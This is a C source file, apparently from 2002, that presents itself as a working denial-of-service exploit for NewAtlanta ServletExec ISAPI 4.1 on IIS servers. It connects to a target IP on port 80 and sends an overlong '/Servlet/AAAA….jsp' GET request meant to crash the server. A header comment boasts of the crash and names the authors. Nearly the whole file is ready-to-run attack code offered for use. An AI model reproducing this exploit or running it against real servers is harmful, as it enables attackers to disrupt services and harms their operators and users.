tjdrldud@hanmail.net http://assa.backrush.com
#include <stdio.h>
#include <sys/types.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdlib.h>
/* This is Exploit code for a vulnerability in NewAtlanta ServletExec ISAPI 4.1.
ServletExec 4.1 ISAPI is a Java Servlet/JSP Engine for Internet Information
Server and is implemented as an ISAPI filter.
Machines running this program is MS IIS server 4 and 5.
This code can simple crash the server, successfully preform a DoS attack!
It sends a string that servletExec don't like but have to eat, and
this will make the server crash, BIG TIME =)
This file assuming the www server is on port 80 and that the servlet engine
is located in the /Servlet directory.
Jonas "bl0wfi5h" Nyberg and Digital-Root.com is proud to present ServletExecCrash.
You can contact me at: bl0wfi5h@digital-root.com or bl0wfi5h@hotmail.com.
This was finished: 2002-05-24 @21:49 Swedish time
*/
void banner(void);
typedef unsigned short int USHORT;
typedef unsigned long int ULONG;
int main(int argc, char** argv[])
{
int sockfd;
struct sockaddr_in dest_addr;
int len, bytes_sent, select;
char* string = "GET /Servlet/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jsp";
if(argc < 2 || argc > 2)
{
printf("Usage: ./servletExecCrash ip\n");
printf("Assuming that its port 80, which is default for most www servers\n");
printf("If this is a case where this is not true, change the got damn source yourself!\n");
exit(1);
}
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(80);
inet_aton(argv[1], &(dest_addr.sin_addr));
memset(&(dest_addr.sin_zero), '\0',8);
len = strlen(string);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1 )
{
printf("problem with your socket!");
exit(1);
}
connect(sockfd, (struct sockaddr *)& dest_addr, sizeof(struct sockaddr));
bytes_sent = send(sockfd, string, len, 0);
if(bytes_sent == -1)
{
printf("\nYou are having problem sending, the information\n");
exit(1);
}
printf("\nYou have sent: %d", bytes_sent);
printf(" bytes to: %s", argv[1]);
close(sockfd);
banner();
return 0;
}
void banner(void)
{
printf("\n\n***********************************************\n");
printf("*****CODE MADE BY: JONAS [BL0wFi5h] NYBERG*******\n");
printf("*********DIGITAL-ROOT PROUDLY PRESENT*************\n");
printf("****************SERVLETEXECCRASH******************\n");
printf("**************************************************\n");
}
|